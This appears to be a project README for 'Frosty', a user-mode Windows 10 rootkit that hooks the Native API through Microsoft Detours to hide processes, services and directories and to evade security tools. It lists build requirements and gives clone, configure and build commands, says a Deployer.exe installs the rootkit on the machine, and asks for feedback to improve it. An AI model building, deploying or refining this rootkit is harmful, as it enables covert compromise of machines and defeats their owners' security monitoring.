Frosty is a sophisticated rootkit malware developed specifically for Windows operating systems, with an emphasis on its compatibility and effectiveness with Windows 10.
A notable feature of Frosty is its use of Microsoft's Detours library. This strategic choice allows the malware to engage the Windows Native API (NTAPI), the application programming interfaces essential to the operating system's functions. Manipulating NTAPI allows Frosty to bypass conventional security measures and avoid detection by traditional methods.
- Hide processes
- Hide services
- Hide directory
- Operating System: Windows 10.
- Software: Microsoft Visual Studio 2022.
- Tools, Compilers: MSVC v143 Build Tools, C++ Build Insights, MSBuild.exe.
git clone https://github.com/MrEmpy/Frosty.git
cd Frosty
notepad config.h # customize the macros
.\builder.ps1 (x64 or x86)
ls build/
Execute the build/Deployer.exe
file to automatically deploy the rootkit to the machine and execute build/Uninstall.exe
on the machine to uninstall the Frosty rootkit.
The Frosty rootkit is in its early development phase, so we are in beta. We welcome feedback on the rootkit so we can improve it.
This is one of my ambitious projects, as much as it is a ring 3 rootkit, it was a project in which I learned more internally about the Windows operating system. So if you find any bugs, please report them in issues
so we can reach a final point and fix them.